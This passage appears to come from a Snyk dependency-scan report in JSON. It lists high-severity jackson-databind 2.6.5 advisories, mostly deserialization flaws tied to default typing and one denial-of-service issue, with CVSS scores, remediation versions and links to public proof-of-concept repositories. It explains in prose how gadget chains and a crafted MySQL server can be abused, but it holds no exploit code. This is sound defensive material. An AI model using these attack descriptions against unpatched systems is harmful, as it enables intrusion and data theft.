([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36188" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:39:28.531700Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:32Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:03.468032Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Poc" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.757298Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36181" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:41:09.172252Z", - "functions_new": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.686589Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Yangkun (ICSL)" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2854", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", - "title": "GitHub Release" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": 
"2024-03-11T09:50:15.847219Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:04.169362Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", - "epssDetails": { - "percentile": "0.74700", - "probability": "0.00431", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-20190" - ], - "CWE": [ - "CWE-502", - "CWE-918" - ], - "GHSA": [ - "GHSA-5949-rw7g-wx7w" - ], - "RHSA": [ - "RHSA-1610966837463990" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-18T12:50:16.466618Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-16T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-18T17:23:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:17.193594Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9)", - "[2.8.0,2.8.11.4)", - "[2.7.0,2.7.9.6)", - "[,2.6.7.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9", - "2.8.11.4", - "2.7.9.6", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2326", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", - "title": "Github Release Tag" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12086", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "assigner": "Red Hat", - "severity": 
"high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:55.897269Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", - "epssDetails": { - "percentile": "0.74218", - "probability": "0.00415", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12086" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5ww9-j83m-q7qx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-05-19T10:19:10.287403Z", - "functions_new": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-17T18:12:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": 
"maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-05-17T18:12:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.785293Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.12.6.1", - "2.13.2.1" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when using nested objects." 
- }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", - "className": "UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2816", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/3416", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.056720Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 